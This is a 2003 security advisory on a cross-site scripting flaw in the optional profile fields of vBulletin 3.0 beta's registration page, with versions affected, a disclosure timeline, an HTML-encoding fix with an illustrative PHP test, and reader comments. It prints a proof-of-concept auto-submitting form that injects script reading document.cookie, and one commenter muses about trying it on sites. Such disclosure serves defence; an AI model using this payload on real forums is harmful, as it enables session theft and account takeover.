VBulletin New Member XSS Vulnerability

06.08.2003

------------------------------------------------------
VBulletin New Member XSS Vulnerability
------------------------------------------------------
Any kind of XSS attack is possible. With this vulnerability an attacker could access other users' or admins' accounts.
Online URL : http://ferruh.mavituna.com/article.asp?256

------------------------------------------------------
About VBulletin;
------------------------------------------------------
Popular PHP-based forum application

Vendor & Demo;
www.vbulletin.com

------------------------------------------------------
Description;
------------------------------------------------------
On the new member page (register.php), if you skip a required field the system sends you back to the same form and automatically refills the fields with what you entered before. In the standard fields vBulletin successfully handles script injection, but not in optional fields such as "Interests-Hobbies", "Biography", "Occupation", etc.

So you can execute any JS through these fields.

------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0 Beta 2 <> Beta 7

------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 3.0 Gamma
vBulletin 2.3.0
vBulletin 2.2.8 ...


------------------------------------------------------
Vendor Status and Patch;
------------------------------------------------------
26.01.2004: Problem fixed.
Update to vB3 Gamma or later.

------------------------------------------------------
History
------------------------------------------------------
Discovered : 15.07.2003
Vendor Informed : 29.07.2003
Published : 06.08.2003

------------------------------------------------------
Solution;
------------------------------------------------------
HTML-encoding these fields, as is already done for the other inputs, is enough.
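
The fix described above, as an added example that is not vBulletin's code and not part of the original advisory: a refilled form field rendered without and with HTML encoding, plus a check that no submitted value adds markup of its own. The field names, helper names and sample values are assumptions made for the illustration.

```php
<?php
// Added example: not vBulletin code. Field and helper names are hypothetical.

// Constructed POST data: a required field was skipped, so the form is shown
// again with the submitted values filled back in.
$submitted = [
    'username'   => '',                                          // required, left empty
    'occupation' => '"><script>alert(document.cookie)</script>', // optional field
    'biography'  => "O'Reilly & sons <b>fan</b>",                // optional field
];

// Before: the raw value is copied into value="...", so a double quote ends the
// attribute and whatever follows is parsed as markup.
function render_input_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '" />';
}

// After: encode for the HTML attribute context. ENT_QUOTES covers both quote
// styles; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// One renderer for every field, required or optional, so no field can be
// refilled without passing through the encoder.
function render_input_safe(string $name, string $value): string
{
    return '<input type="text" name="' . h($name) . '" value="' . h($value) . '" />';
}

// Regression check: a correctly encoded field contains exactly one tag,
// the <input> element itself.
function count_tags(string $html): int
{
    return (int) preg_match_all('/<[a-zA-Z\/]/', $html);
}

$failed = false;
foreach ($submitted as $name => $value) {
    $unsafe = count_tags(render_input_unsafe($name, $value));
    $safe   = count_tags(render_input_safe($name, $value));
    printf("%-10s unsafe tags=%d safe tags=%d\n", $name, $unsafe, $safe);
    $failed = $failed || $safe !== 1;
}
exit($failed ? 1 : 0);
```

The same tag count can be run over every field of a rendered registration form in a test suite, so an optional field added later without encoding is caught.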

------------------------------------------------------
Exploit Code;
------------------------------------------------------
[form action="http://[victim]/register.php?do=register" method="post" style="display:none"]
	[input type="hidden" name="s" value="" /]
	[input type="hidden" name="regtype" value="1" /]
	[input type="text" class="bginput" name="field1" value="" size="25" maxlength="250" /]
	[input type="hidden" name="url" value="index.php" /]
	[input type="hidden" name="do" value="addmember" /]
[/form]
[script]
	//Code that will be executed
	var xss = "\"][script]alert(document"+".cookie)[\/script]";
	document.forms[0].field1.value=xss;
	document.forms[0].submit();
[/script]

*Replace ([],<>)

Ferruh Mavituna
http://ferruh.mavituna.com
Web Application Security Specialist

Comments


Come on, write these in Turkish, man.

:) [ # | 19.12.2003 ]

Thanks a lot, man, for the info.

[ # | 06.02.2004 ]

Honestly, once again I didn't understand a thing.

ErKan Cengiz [ # | 14.07.2004 ]

Ah, now I get it. I think it goes like this: we edit this code in a text editor

[form action=" http://[victim]/register.php?do=register" method="post" style="display:none"]

the target site is written where it says victim

and our text document is saved as a web page, I think, and then when it is opened, if the site has the hole, you get in, something like that, but I'm not completely sure, I'll try it sometime... you're a man whose hand deserves to be kissed, Ferruh :) you've got gems in you, teach them to us too

ErKan Cengiz [ # | 14.07.2004 ]

Ferruh Mavituna
© 2002-2007, Ferruh Mavituna
